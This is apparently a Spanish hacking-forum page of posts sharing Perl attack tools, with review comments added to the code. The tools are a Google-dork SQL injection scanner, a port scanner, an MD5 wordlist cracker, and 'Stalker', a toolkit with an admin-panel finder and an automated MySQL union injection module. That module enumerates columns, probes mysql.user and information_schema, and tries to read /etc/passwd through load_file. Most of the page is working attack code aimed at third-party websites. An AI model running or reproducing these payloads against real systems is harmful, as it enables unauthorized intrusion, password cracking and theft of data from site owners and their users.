
Mensajes - BigBear

#501
Una forma más fácil de instalar módulos de Perl en Windows es usar el comando ppm install
#502
Un simple scanner de SQLI para usar con Google


#!usr/bin/perl
#Search Google for scan SQLI
#(C) Doddy Hackman 2011

use LWP::UserAgent;
use HTML::LinkExtor;

# Shared HTTP client for the whole script. The fixed Firefox 2 User-Agent
# string and the 5 s timeout below are constant across every request this
# tool makes, which makes its traffic easy to pick out in server logs.
my $nave = LWP::UserAgent->new;
$nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
$nave->timeout(5);

head();

# Interactive input, read without validation: $dork is interpolated straight
# into the search URL and $pages is used as a numeric loop bound in google().
print "\n\n[Dork] : ";
chomp(my $dork = <stdin>);
print "\n\n[Pages] : ";
chomp(my $pages = <stdin>);
print "\n\n[Starting the search]\n\n";
my @links = google($dork,$pages);
print "\n[Links Found] : ".int(@links)."\n\n\n";
print "[Starting the scan]\n\n\n";
# Keep only URLs that carry a query parameter. The greedy (.*)= captures up
# to the LAST "=" in the link, so multi-parameter URLs are cut at that point.
for my $link(@links) {
if ($link=~/(.*)=/ig) {
my $web = $1;
sql($web."=");
}}
print "\n\n[+] Finish\n";
copyright();
# Never reached: copyright() calls exit(1).
<stdin>;

# Fetches Google result pages for the query in $a (result offsets 10, 20, ...
# up to $b; the first page at offset 0 is never requested), keeps the
# "webcache" links and returns the de-duplicated target URLs found in them.
# Review notes grounded in the code: $a and $b are Perl's sort variables;
# $pages is the file-scoped lexical from the prompt, so this loop overwrites
# it; @url and @founds are package globals that are never emptied, so a
# second call returns the accumulated results of every call so far.
sub google {
my($a,$b) = @_;
for ($pages=10;$pages<=$b;$pages=$pages+10) {
$code = toma("http://www.google.com.ar/search?hl=&q=".$a."&start=$pages");
my @links = get_links($code);
for my $l(@links) {
if ($l =~/webcache.googleusercontent.com/) {
push(@url,$l);
}
}
}

# The cached-copy link carries the original URL between "cache:<id>:" and "+".
for(@url) {
if ($_ =~/cache:(.*?):(.*?)\+/) {
push(@founds,$2);
}
}

# Right-hand @founds is the global; the new lexical only exists afterwards.
my @founds = repes(@founds);

return @founds;
}


# Sends one probe request built from $page and prints the page as a hit when
# the response body contains the MySQL column-count error text. Returns
# nothing useful; $code1 is a package global. The body is searched with an
# unanchored /ig match, so any page that merely echoes that phrase also counts.
sub sql {
my ($pass1,$pass2) = ("+","--");
my $page = shift;
$code1 = toma($page."-1".$pass1."union".$pass1."select".$pass1."666".$pass2);
if ($code1=~/The used SELECT statements have a different number of columns/ig) {
print "[+] SQLI : $page\a\n";
}}

# Runs HTML::LinkExtor over the HTML in $_[0] and returns every link attribute
# value it reported. The callback pushes into the file-level @links (the one
# declared with "my" at the top of the script), which is never cleared here,
# so each call returns everything collected so far. agarrar is a named sub
# nested in another sub: Perl hoists it to package level; it is not a closure.
sub get_links {

$test = HTML::LinkExtor->new(\&agarrar)->parse($_[0]);
return @links;

# Called once per tag: $a is the tag name, %b maps attribute name => link.
sub agarrar {
my ($a,%b) = @_;
push(@links,values %b);
}
}

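# Returns the elements of @_ with duplicates removed, keeping the first
# occurrence of each in its original order (string equality, as hash keys).
# The seen-set is lexical so every call starts clean; the original used the
# package globals %repe and @limpio, which were never reset, so a second call
# also returned everything from the first.
sub repes {
    my %seen;
    return grep { !$seen{$_}++ } @_;
}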

# Prints the banner shown before the prompts.
sub head {
    my $banner = "-- == Search Google == --";
    print "\n\n", $banner, "\n\n";
}

# Prints the credit line and terminates the process. Note the exit status is
# 1, i.e. the script reports failure to the shell even after a normal run.
sub copyright {
    my $notice = "(C) Doddy Hackman 2011";
    print "\n\n$notice\n\n";
    exit 1;
}

# GET $url through the shared $nave client and return the raw body. There is
# no is_success check, so an error page or LWP's own error text comes back
# exactly like a real response.
sub toma {
    my ($url) = @_;
    my $response = $nave->get($url);
    return $response->content;
}

# POST the key/value pairs of the hashref $var to $web as form data and return
# the raw body (no status check, as in toma()).
sub tomar {
    my ($web,$var) = @_;
    my @form = %{$var};
    my $response = $nave->post($web, \@form);
    return $response->content;
}

#Thanks to explorer (PerlEnEspañol)
# ¿ The End ?

#503
Scripting / [Perl] Scan Port By Doddy H
7 Octubre 2011, 15:56 PM
Hola a todos, acá les traigo un simple scanner de puertos
hecho en Perl


#!usr/bin/perl
#Scan Port
#(C) Doddy Hackman 2011
#Creditos

use IO::Socket;

head();
# The only argument is the host to probe. It is checked for truthiness only
# (so a host of "0" also prints usage); there is no other validation.
unless($ARGV[0]) {
print "\n\n[sintax] : ".$0." <ip> \n\n";
} else {
scan($ARGV[0]);
}
# copyright() exits with status 1, even on a normal run.
copyright();

# Tries a TCP connect to each of six fixed ports on the host in $_[0], with a
# 0.5 s timeout per port, and prints the ones that accepted the connection.
# Review notes: "new IO::Socket::INET(...)" is indirect-object syntax (prefer
# IO::Socket::INET->new(...)); the socket is never closed explicitly and only
# goes away when the temporary is freed; keys %ports has no fixed order, so
# the output order changes between runs; a refused port and a timed-out one
# are not distinguished - both are simply not printed.
sub scan {

my %ports = ("21"=>"ftp",
"22"=>"ssh",
"25"=>"smtp",
"80"=>"http",
"110"=>"pop3",
"3306"=>"mysql"
);


print "\n[+] Scanning $_[0]\n\n\n";

for my $port(keys %ports) {

if (new IO::Socket::INET(PeerAddr => $_[0],PeerPort => $port,Proto => "tcp",Timeout  => 0.5)) {
print "[Port] : ".$port." [Service] : ".$ports{$port}."\n";
}
}

}

# Prints the banner shown before the scan starts.
sub head {
    my $banner = "-- == Scan Port == --";
    print "\n\n", $banner, "\n\n";
}

# Prints the credit line and terminates the process with status 1 (non-zero
# even on a normal run).
sub copyright {
    my $notice = "(C) Doddy Hackman 2011";
    print "\n\n$notice\n\n";
    exit 1;
}



Ejemplo de uso


perl scan.pl localhost
#504
Scripting / [Perl] Search MD5
7 Octubre 2011, 15:56 PM
Hola a todos

Hoy acabo de hacer un crackeador de hash MD5 con salt o sin él.
En esta versión es con ventanas usando Tk


#Search MD5
#Version : Tk
#Author : Doddy Hackman


use Tk;
use Digest::MD5;
use Tk::FileSelect;
use Tk::ROText;

# "use" is compile-time: Win32::Console is loaded on every platform and the
# script fails to start where the module is absent. The if only guards the
# Free() call that detaches the console window.
if ($^O eq 'MSWin32') {
use Win32::Console;
Win32::Console::Free();
}

# Main window. $hash, $salt and $o hold the return value of ->place(), which
# in Perl/Tk appears to be the widget itself (they are used as widgets in
# crack() and oper()) - confirm against the Tk version in use.
my $w = MainWindow->new(-background=>"black");
$w->title("Search MD5");
$w->geometry("500x200+20+20");
$w->resizable(0,0);
$w->Label(-text=>"Search MD5",-background=>"black",-foreground=>"cyan",-font=>"Impact")->pack();
$w->Label(-text=>"Hash",-background=>"black",-foreground=>"green")->place(-x =>40, -y => 55);
my $hash = $w->Entry(-text=>"30d554c3665c8f204622b2003c77d994",-background=>"black",-foreground=>"green")->place(-x =>90, -y => 55);
$w->Label(-text=>"Salt",-background=>"black",-foreground=>"green")->place(-x =>260, -y => 55);
# A literal "X" in the salt field means "no salt" (see crack()).
my $salt = $w->Entry(-text=>"X",-background=>"black",-foreground=>"green")->place(-x =>290, -y => 55);
$w->Label(-text=>"Wordlist",-background=>"black",-foreground=>"green")->place(-x =>40, -y => 100);
# $file is an undeclared package global bound to this Entry; oper() declares
# its own lexical $file and updates the widget through configure() instead.
my $o = $w->Entry(-textvariable=>\$file,-background=>"black",-foreground=>"green")->place(-x =>90, -y => 100);
$w->Button(-text=>"Browse",-background=>"black",-foreground=>"red",-activebackground=>"red",-command=>\&oper)->place(-x =>230, -y => 100);
$w->Button(-text=>"Crack!",-foreground=>"green",-background=>"black",-command=>\&crack,-activebackground=>"green")->place(-x =>180, -y => 160);
$w->Button(-text=>"About",-foreground=>"green",-background=>"black",-command=>\&about,-activebackground=>"green")->place(-x =>240, -y => 160);
$w->Button(-text=>"Exit",-foreground=>"green",-background=>"black",-command=>[$w =>'destroy'],-activebackground=>"green")->place(-x =>300, -y => 160);

# "Browse" button callback: opens a file dialog rooted at "/" and copies the
# chosen path into the wordlist Entry. $browse is a package global; the
# lexical $file here shadows the global one bound via -textvariable, so the
# widget is updated with configure(-text => ...) rather than through it.
sub oper{
$w->update;
$browse = $w->FileSelect(-directory => "/");
my $file = $browse->Show;
$o->configure (-text =>$file);
}

# "About" button callback: opens a small window with the author text and an
# Exit button that destroys that window only.
sub about {
    my $venta = MainWindow->new(-background=>"black");
    $venta->geometry("300x180+20+20");
    $venta->title("About");
    $venta->resizable(0,0);
    my $about_text = "\nSearch MD5\n\n\nProgrammer : Doddy Hackman\n\nContact : lepuke[at]hotmail[com]\n\n";
    $venta->Label(
        -text       => $about_text,
        -background => "black",
        -foreground => "yellow",
    )->pack();
    $venta->Button(
        -text             => "Exit",
        -foreground       => "yellow",
        -background       => "black",
        -command          => [$venta => 'destroy'],
        -activebackground => 'yellow',
    )->pack()
}

# "Crack!" button callback: reads hash, salt and wordlist path from the
# widgets, opens a status window and compares md5(word . salt) for each line
# of the wordlist against the given hash.
# Review notes, all visible below:
#  - "$digest == $hash" compares two hex strings NUMERICALLY: each converts to
#    its leading digits (0 when it starts with a letter), so unrelated hashes
#    compare equal and the first word is often reported as a false match.
#    A string compare ("eq") is what the check needs.
#  - Digest::MD5->md5_hex(...) calls the plain function with the class name as
#    first argument; md5_hex joins its arguments, so the class name looks like
#    it is hashed in too - confirm, but then a plain md5 can never match.
#  - "next" is used outside any loop; in a Tk callback that is a runtime error
#    ("Can't next outside a loop block") reported through Tk's error handler.
#  - $ok is a package global that is never reset, so once any run succeeds
#    every later failing run skips the "hash not cracked" message.
#  - 2-arg "open word,$wordlist" with a bareword handle: mode characters in
#    the path change how it is opened; use 3-arg open with a lexical handle.
sub crack {
my $hash = $hash->get;
my $salt = $salt->get;
my $wordlist = $o->get;

my $console = MainWindow->new(-background=>"black");
$console->title("Status");
$console->resizable(0,0);
$console->geometry("400x320+20+20");
$console->Label(-text=>"Status",-background=>"black",-foreground=>"green",-font=>"Impact")->pack();
my $box = $console->ROText(-background=>"black",-foreground=>"green",-width=> 45,-height=> 15)->place(-x =>40,-y=>50);
$console->Button(-text=>"Exit",-background=>"black",-foreground=>"green",-activebackground=>"green",-command=> [$console => 'destroy'],-width=>"20")->place(-x =>130, -y => 280);
# "X" is the sentinel for "no salt" pre-filled in the Entry.
if ($salt eq "X") { $salt = "";}
unless (-f $wordlist) { $box->insert('end',"\n\n[-] Wordlist dont exist!\n\n");next;}
if(length($hash)==32) {
$box->insert('end',"[Hash] : $hash\n[Salt] : $salt\n[Wordlist] : $wordlist\n\n");
open word,$wordlist;
@words = <word>;
close word;
for my $pass(@words) {
chomp $pass;
$console->update;
$box->insert('end',"[+] Trying with $pass\n");
$digest = Digest::MD5->md5_hex($pass.$salt);chomp $digest;
if ($digest == $hash) {print "\a\a";$box->insert('end',"\n[Hash encoded] : $hash\n[Hash decoded] : $pass\n\n");$ok="1";last;}
}} else { $box->insert('end',"\n\n[-] The hash is incorrect\n\n");next;}
unless ($ok eq "1") {$box->insert('end',"\n\n[-] Sorry , hash not cracked\n\n");next;}}

# Hands control to Tk; the button callbacks above run from inside this loop.
MainLoop;


#505
Scripting / [Perl] Stalker By Doddy H
7 Octubre 2011, 15:56 PM
Bueno, acá les traigo un programa que he estado
haciendo esta última semana

Se llama Stalker, sirve como consola en caso de que cmd.exe no esté
disponible y tiene las siguientes funciones

  • Mostrar IP de servidor específico
  • Capturar todos los links de una página
  • Recibir procesos de nuestra máquina
  • Cerrar el proceso que nos moleste
  • Conectar a un servidor y mostrar respuesta
  • Capturar métodos HTTP de un servidor web
  • Verificar listado de directorios en una página
  • Codificación y decodificación de hex/ascii/base64
  • Escanear puertos de una IP
  • Buscar panel de administración
  • Crackear hash md5 mediante webs
  • Buscar en Google páginas vulnerables a SQLI
  • Cliente FTP
  • Navegador por nuestros archivos y directorios
  • Y ejecutar comandos


    #!usr/bin/perl
    #Project STALKER (C) Doddy Hackman 2011
    #
    #ppm install http://www.bribes.org/perl/ppm/DBI.ppd
    #ppm install http://theoryx5.uwinnipeg.ca/ppms/DBD-mysql.ppd
    #
    #You need download this http://search.cpan.org/~animator/Color-Output-1.05/Output.pm
    #

    use IO::Socket;
    use HTML::LinkExtor;
    use LWP::UserAgent;
    use Win32::OLE qw(in);
    use Win32::Process;
    use Net::FTP;
    use Cwd;
    use URI::Split qw(uri_split);
    use MIME::Base64;
    use DBI;
    use Color::Output;
    # No semicolon ends this line, so the @panels assignment that follows is
    # most likely parsed as Init's argument list (the assignment itself still
    # happens first) - verify before relying on it.
    Color::Output::Init

    # Candidate paths tried by scanpanel() (defined outside this view). Several
    # entries below wrap across a line break inside the quotes, so those
    # strings contain a newline plus the leading spaces of the next line.
    @panels=('admin/admin.asp','admin/login.asp','admin/index.asp','admin/admin.aspx'
    ,'admin/login.aspx','admin/index.aspx','admin/webmaster.asp','admin/webmaster.aspx'
    ,'asp/admin/index.asp','asp/admin/index.aspx','asp/admin/admin.asp','asp/admin/admin.aspx'
    ,'asp/admin/webmaster.asp','asp/admin/webmaster.aspx','admin/','login.asp','login.aspx'
    ,'admin.asp','admin.aspx','webmaster.aspx','webmaster.asp','login/index.asp','login/index.aspx'
    ,'login/login.asp','login/login.aspx','login/admin.asp','login/admin.aspx'
    ,'administracion/index.asp','administracion/index.aspx','administracion/login.asp'
    ,'administracion/login.aspx','administracion/webmaster.asp','administracion/webmaster.aspx'
    ,'administracion/admin.asp','administracion/admin.aspx','php/admin/','admin/admin.php'
    ,'admin/index.php','admin/login.php','admin/system.php','admin/ingresar.php'
    ,'admin/administrador.php','admin/default.php','administracion/','administracion/index.php'
    ,'administracion/login.php','administracion/ingresar.php','administracion/admin.php'
    ,'administration/','administration/index.php','administration/login.php'
    ,'administrator/index.php','administrator/login.php','administrator/system.php','system/'
    ,'system/login.php','admin.php','login.php','administrador.php','administration.php'
    ,'administrator.php','admin1.html','admin1.php','admin2.php','admin2.html','yonetim.php'
    ,'yonetim.html','yonetici.php','yonetici.html','adm/','admin/account.php','admin/account.html'
    ,'admin/index.html','admin/login.html','admin/home.php','admin/controlpanel.html'
    ,'admin/controlpanel.php','admin.html','admin/cp.php','admin/cp.html','cp.php','cp.html'
    ,'administrator/','administrator/index.html','administrator/login.html'
    ,'administrator/account.html','administrator/account.php','administrator.html','login.html'
    ,'modelsearch/login.php','moderator.php','moderator.html','moderator/login.php'
    ,'moderator/login.html','moderator/admin.php','moderator/admin.html','moderator/'
    ,'account.php','account.html','controlpanel/','controlpanel.php','controlpanel.html'
    ,'admincontrol.php','admincontrol.html','adminpanel.php','adminpanel.html','admin1.asp'
    ,'admin2.asp','yonetim.asp','yonetici.asp','admin/account.asp','admin/home.asp'
    ,'admin/controlpanel.asp','admin/cp.asp','cp.asp','administrator/index.asp'
    ,'administrator/login.asp','administrator/account.asp','administrator.asp'
    ,'modelsearch/login.asp','moderator.asp','moderator/login.asp','moderator/admin.asp'
    ,'account.asp','controlpanel.asp','admincontrol.asp','adminpanel.asp','fileadmin/'
    ,'fileadmin.php','fileadmin.asp','fileadmin.html','administration.html','sysadmin.php'
    ,'sysadmin.html','phpmyadmin/','myadmin/','sysadmin.asp','sysadmin/','ur-admin.asp'
    ,'ur-admin.php','ur-admin.html','ur-admin/','Server.php','Server.html'
    ,'Server.asp','Server/','wp-admin/','administr8.php','administr8.html'
    ,'administr8/','administr8.asp','webadmin/','webadmin.php','webadmin.asp'
    ,'webadmin.html','administratie/','admins/','admins.php','admins.asp'
    ,'admins.html','administrivia/','Database_Administration/','WebAdmin/'
    ,'useradmin/','sysadmins/','admin1/','system-administration/','administrators/'
    ,'pgadmin/','directadmin/','staradmin/','ServerAdministrator/','SysAdmin/'
    ,'administer/','LiveUser_Admin/','sys-admin/','typo3/','panel/','cpanel/'
    ,'cPanel/','cpanel_file/','platz_login/','rcLogin/','blogindex/','formslogin/
    ','autologin/','support_login/','meta_login/','manuallogin/','simpleLogin/
    ','loginflat/','utility_login/','showlogin/','memlogin/','members/','login-redirect/
    ','sub-login/','wp-login/','login1/','dir-login/','login_db/','xlogin/','smblogin/
    ','customer_login/','UserLogin/','login-us/','acct_login/','admin_area/','bigadmin/'
    ,'project-admins/','phppgadmin/','pureadmin/','sql-admin/','radmind/','openvpnadmin/'
    ,'wizmysqladmin/','vadmind/','ezsqliteadmin/','hpwebjetadmin/','newsadmin/','adminpro/'
    ,'Lotus_Domino_Admin/','bbadmin/','vmailadmin/','Indy_admin/','ccp14admin/'
    ,'irc-macadmin/','banneradmin/','sshadmin/','phpldapadmin/','macadmin/'
    ,'administratoraccounts/','admin4_account/','admin4_colon/','radmind-1/'
    ,'Super-Admin/','AdminTools/','cmsadmin/','SysAdmin2/','globes_admin/'
    ,'cadmins/','phpSQLiteAdmin/','navSiteAdmin/','server_admin_small/','logo_sysadmin/'
    ,'server/','database_administration/','power_user/','system_administration/'
    ,'ss_vms_admin_sm/');


    # Log directory setup. The test looks at the ABSOLUTE path /logs/webs but
    # the mkdir calls create the RELATIVE logs/webs under the current directory,
    # and 777 here is decimal (octal 01411), not the intended 0777. Results of
    # the mkdir calls are not checked.
    unless (-d "/logs/webs") {
    mkdir("logs/",777);
    mkdir("logs/webs/",777);
    }

    # Shared HTTP client; the fixed Firefox 2 User-Agent string and 5 s timeout
    # are constant across every request, which makes this tool's traffic easy
    # to recognise in web-server logs.
    my $nave = LWP::UserAgent->new;
    $nave->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12");
    $nave->timeout(5);

    head();

    getinfo();

    # Ctrl-C handler is a reference to a sub named "next" (not the keyword);
    # it is not defined anywhere in this view, so the handler would die with
    # "Undefined subroutine" unless it exists elsewhere in the file.
    $SIG{INT} = \&next;

    # Main read-eval loop; the cprint escapes switch the console colour around
    # each prompt. Several subs "next" out of themselves back to this loop.
    while(1) {
    cprint "\x037"; #13
    menujo();
    cprint "\x030";
    }

    # Prints the OS name ($^O), the Windows login name and domain. The Win32::
    # functions come from the Win32 module, which is not loaded explicitly
    # here; $so, $login and $domain are package globals.
    sub getinfo {
    $so = $^O;
    $login = Win32::LoginName();
    $domain = Win32::DomainName();
    cprint "\x0313"; #13
    print "\n\n[SO] : $so [Login] : $login [Group] : $domain\n\n";
    cprint "\x030";
    }


    # Reads one command line from stdin and dispatches it. Every branch matches
    # with an UNANCHORED regex and the first match wins, so e.g. a line whose
    # argument merely contains "help" or "exit" triggers that branch instead.
    # Anything unrecognised is handed to system() as a shell command string.
    sub menujo {
    print "\n\n>";
    chomp (my $cmd = <stdin>);
    print "\n\n";

    if ($cmd=~/getinfo/ig) {
    getinfo();
    }
    elsif ($cmd =~/getip (.*)/) {
    my $te = $1;
    # Prints usage on an empty host but still falls through to getip($1).
    if ($te eq "" or $te eq " ") {
    print "\n[+] sintax : getip <host>\n";
    }
    print "\n[IP] : ".getip($1)."\n";
    print "\n";
    }

    elsif ($cmd =~/getlink (.*)/) {
    print "[+] Extracting links in the page\n\n\n";
    $code = toma($1);
    my @re = get_links($code);
    for my $url(@re) {
    chomp $url;
    print "[Link] : $url\n";
    }
    print "\n\n[+] Finish\n";
    }

    elsif ($cmd=~/help/) {
    helpme();
    }

    elsif ($cmd=~/getprocess/) {
    my %re = getprocess();


    for my $data(keys %re) {
    # $t is never assigned in this sub, so $proceso/$pid stay empty; the
    # output below comes from %re directly.
    ($proceso,$pid) = ($t=~/(.*):(.*)/ig);
    print "[+] Proceso : ".$data."\n";
    print "[+] PID : ".$re{$data}."\n\n";
    }
    }
    elsif ($cmd=~/killprocess (.*) (.*)/) {
    if (killprocess($1,$2)) {
    print "[+] Process $1 closed";
    }
    }
    elsif ($cmd=~/conec (.*) (.*) (.*)/) {
    print conectar($1,$2,$3);
    }
    elsif ($cmd=~/allow (.*)/) {
    $re = conectar($1,"80","GET / HTTP/1.0\r\n");
    if ($re=~/Allow:(.*)/ig) {
    print "[+] Metodos : ".$1."\n";
    }}
    elsif ($cmd=~/paths (.*)/) {
    scanpaths($1);
    }
    elsif ($cmd=~/encodehex (.*)/) {
    print "\n\n[+] ".hex_en($1)."\n\n";
    }
    elsif ($cmd=~/decodehex (.*)/) {
    print "\n\n[+] ".hex_de($1)."\n\n";
    }
    elsif ($cmd=~/download (.*) (.*)/) {
    # Precedence bug: only $file is declared (and left undef); $name = $1 is
    # a separate global assignment. Neither is used; the call uses $1/$2.
    my $file,$name = $1,$2;
    if (download($1,$2)) {
    print "[+] File downloaded\n";
    }
    }
    elsif ($cmd=~/encodeascii (.*)/) {
    print "\n\n[+] ".ascii($1)."\n\n";
    }
    elsif ($cmd=~/decodeascii (.*)/) {
    print "\n\n[+] ".ascii_de($1)."\n\n";
    }
    elsif ($cmd=~/encodebase (.*)/) {
    print "\n\n[+] ".base($1)."\n\n";
    }
    elsif ($cmd=~/decodebase (.*)/) {
    print "\n\n[+] ".base_de($1)."\n\n";
    }
    elsif ($cmd=~/aboutme/) {
    aboutme();
    }
    elsif ($cmd=~/scanport (.*)/) {
    scanport($1);
    }
    elsif ($cmd=~/panel (.*)/) {
    scanpanel($1);
    }
    elsif ($cmd=~/scangoogle/) {
    print "[Dork] : ";
    chomp(my $dork = <stdin>);
    print "\n\n[Pages] : ";
    chomp(my $pages = <stdin>);
    print "\n\n[Starting the search]\n\n";
    my @links = google($dork,$pages);
    print "\n[Links Found] : ".int(@links)."\n\n\n";
    print "[Starting the scan]\n\n\n";
    for my $link(@links) {
    if ($link=~/(.*)=/ig) {
    my $web = $1;
    sql($web."=");
    }}
    print "\n\n[+] Finish\n";
    }
    elsif ($cmd=~/getpass (.*)/) {
    crackit($1);
    }
    elsif ($cmd=~/ftp (.*) (.*) (.*)/) {
    ftp($1,$2,$3);
    }
    elsif ($cmd=~/navegator/) {
    # File-browser sub-shell: the label plus "goto nave" at the bottom form
    # the loop; "exit" leaves it with "next", which has no loop inside this
    # sub and relies on the caller's while(1) (deprecated "Exiting
    # subroutine via next" behaviour - confirm on the perl in use).
    nave:
    print getcwd().">";
    chomp(my $rta = <stdin>);
    print "\n\n";
    if ($rta=~/list/) {
    my @files = coleccionar(getcwd());
    for(@files) {
    if (-f $_) {
    print "[File] : ".$_."\n";
    } else {
    print "[Directory] : ".$_."\n";
    }}}
    if ($rta=~/cd (.*)/) {
    my $dir = $1;
    if (chdir($dir)) {
    print "\n[+] Directory changed\n";
    } else {
    print "\n[-] Error\n";
    }}
    if ($rta=~/del (.*)/) {
    my $file = getcwd()."/".$1;
    if (-f $file) {
    if (unlink($file)) {
    print "\n[+] File Deleted\n";
    } else {
    print "\n[-] Error\n";
    }
    } else {
    if (rmdir($file)) {
    print "\n[+] Directory Deleted\n";
    } else {
    print "\n[-] Error\n";
    }}}
    if ($rta=~/rename (.*) (.*)/) {
    if (rename(getcwd()."/".$1,getcwd()."/".$2)) {
    print "\n[+] File Changed\n";
    } else {
    print "\n[-] Error\n";
    }}
    if ($rta=~/open (.*)/) {
    my $file = $1;
    chomp $file;
    # Single-string system(): goes through the shell when the name contains
    # shell metacharacters.
    system($file);
    #system(getcwd()."/".$file);
    }
    if ($rta=~/help/) {
    print "\nCommands : help cd list del rename open exit\n\n";
    }
    if ($rta=~/exit/) {
    next;
    }
    print "\n\n";
    goto nave;
    }
    elsif ($cmd=~/kobra (.*)/) {
    my $url = $1;
    chomp $url;
    scansqli($url,"--");
    }
    elsif ($cmd=~/mysql (.*) (.*) (.*)/) {
    enter($1,$2,$3);
    }
    elsif ($cmd=~/exit/) {
    copyright();
    <stdin>;
    exit(1);
    }
    else {
    # Fallback: the raw input line is executed via the shell.
    system($cmd);
    }
    #print "\n\n";
    }


    # Entry point of the "kobra" command: $_[0] is the URL, $_[1] the separator
    # style for bypass(). If the URL already contains the "hackman" placeholder
    # it goes straight to menu_options(); otherwise &length() is asked to work
    # out the query and $control eq 1 signals success.
    # Review notes: "$pass = &bypass(...)" is a scalar-context call, so $pass
    # receives only the LAST element of the returned pair (the comment token),
    # not both; "my $save" is declared twice in this scope; when &length()
    # finds nothing it falls off its end, so $gen/$save/$control hold whatever
    # its last expression produced and "print $control" prints that leftover;
    # the failure path re-enters menujo() instead of returning, so the call
    # stack grows with each failed scan.
    sub scansqli {
    print "[Status] : Scanning.....\n";
    $pass = &bypass($_[1]);
    my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
    my $save = $auth;
    if ($_[0]=~/hackman/ig) {
    savefile($save.".txt","\n[Target Confirmed] : $_[0]\n");
    &menu_options($_[0],$pass,$save);
    }
    my ($gen,$save,$control) = &length($_[0],$_[1]);
    if ($control eq 1) {
    print "[Status] : Enjoy the menu\n\n";
    &menu_options($gen,$pass,$save);
    } else {
    print $control;
    print "[Status] : Length columns not found\n\n";
    menujo();
    }
    }

    # Probes $_[0] for an error-based MySQL response, then counts columns by
    # adding one "char(...)" marker per iteration until the RATSXPDOWN marker
    # is reflected. On success returns (query-with-placeholder, host, 1) and
    # logs to <host>.txt; on failure it falls off the end and returns the value
    # of the last expression evaluated, NOT an empty list.
    # Review notes: this sub is named like the builtin length() and is only
    # reachable via "&length(...)"; "my $rows" is shadowed by the loop variable
    # of the same name; $patha takes $1 after a chain of alternatives of which
    # only the first has a capture group, and two toma() calls sit between the
    # match and the read, so its value is unreliable - confirm; $control,
    # $total, $alert, $injection, $test and @number are package globals.
    # Detection: both request and response carry the literal RATSXPDOWN marker.
    sub length {
    my $rows  = "0";
    my $asc;
    my $page = $_[0];
    ($pass1,$pass2) = &bypass($_[1]);
    $inyection = $page.$pass1."and".$pass1."1=0".$pass1."order".$pass1."by".$pass1."9999999999".$pass2;
    $code = toma($inyection);
    if ($code=~ /supplied argument is not a valid MySQL result resource in <b>(.*)<\/b> on line /ig || $code=~ /mysql_free_result/ig || $code =~ /mysql_fetch_assoc/ig ||$code =~ /mysql_num_rows/ig || $code =~ /mysql_fetch_array/ig || $code =~/mysql_fetch_assoc/ig || $code=~/mysql_query/ig || $code=~/mysql_free_result/ig || $code=~/equivocado en su sintax/ig || $code=~/You have an error in your SQL syntax/ig || $code=~/unknown column/ig || $code=~/Call to undefined function/ig) {
    # Two responses that differ between "1=0" and "1=1" are taken as proof.
    my $testar1 = toma($page.$pass1."and".$pass1."1=0".$pass2);
    my $testar2 = toma($page.$pass1."and".$pass1."1=1".$pass2);
    unless ($testar1 eq $testar2) {
    my $patha = $1;
    chomp $patha;
    $alert = "char(".ascii("RATSXPDOWN1RATSXPDOWN").")";
    $total = "1";
    for my $rows(2..200) {
    $asc.= ","."char(".ascii("RATSXPDOWN".$rows."RATSXPDOWN").")";
    $total.= ",".$rows;
    $injection = $page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$alert.$asc;
    $test = toma($injection);
    if ($test=~/RATSXPDOWN/) {
    @number = $test =~m{RATSXPDOWN(\d+)RATSXPDOWN}g;
    $control = 1;
    my ($scheme, $auth, $path, $query, $frag)  = uri_split($_[0]);
    my $save = $auth;
    savefile($save.".txt","\n[Target confirmed] : $page");
    savefile($save.".txt","[Bypass] : $_[1]\n");
    savefile($save.".txt","[Limit] : The site has $rows columns");
    savefile($save.".txt","[Data] : The number @number print data");
    if ($patha) {
    savefile($save.".txt","[Full Path Discloure] : $patha");
    }
    # The first reflected column number is swapped for the "hackman"
    # placeholder that the other subs substitute their expressions into.
    $total=~s/$number[0]/hackman/;
    savefile($save.".txt","[SQLI] : ".$page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total);
    return($page.$pass1."and".$pass1."1=0".$pass1."union".$pass1."select".$pass1.$total,$save,$control);
    }}}}}


    # "details" command: splits $page at the "hackman" placeholder, substitutes
    # three probe expressions, and reports whether mysql.user,
    # information_schema.tables and load_file() are reachable, then version(),
    # database() and user(). Everything is also appended to <$save>.txt.
    # Review notes: $inforschema, $mysqluser, $test1..$test3, $concat, $code
    # and $injection are package globals; the response checks are unanchored
    # /ig matches on the ERTOR854 marker; (.*) between markers is greedy, so
    # a page that reflects the marker more than once mis-parses.
    # Detection: the ERTOR854 marker and the fixed char()/unhex(hex()) forms
    # appear verbatim in the request query string.
    sub details {
    my ($page,$bypass,$save) = @_;
    ($pass1,$pass2) = &bypass($bypass);
    savefile($save.".txt","\n");
    if ($page=~/(.*)hackman(.*)/ig) {
    print "\n\n[+] Searching information..\n\n";
    my  ($start,$end) = ($1,$2);
    $inforschema = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."information_schema.tables".$pass2;
    $mysqluser = $start."unhex(hex(concat(char(69,82,84,79,82,56,53,52))))".$end.$pass1."from".$pass1."mysql.user".$pass2;
    $test3 = toma($start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
    $test1 = toma($inforschema);
    $test2 = toma($mysqluser);
    if ($test2=~/ERTOR854/ig) {
    savefile($save.".txt","[mysql.user] : ON");
    print "[mysql.user] : ON\n";
    } else {
    print "[mysql.user] : OFF\n";
    savefile($save.".txt","[mysql.user] : OFF");
    }
    if ($test1=~/ERTOR854/ig) {
    print "[information_schema.tables] : ON\n";
    savefile($save.".txt","[information_schema.tables] : ON");
    } else {
    print "[information_schema.tables] : OFF\n";
    savefile($save.".txt","[information_schema.tables] : OFF");
    }
    if ($test3=~/ERTOR854/ig) {
    print "[+] load_file permite ver los archivos\n";
    savefile($save.".txt","[load_file] : ".$start."unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))".$end.$pass2);
    }
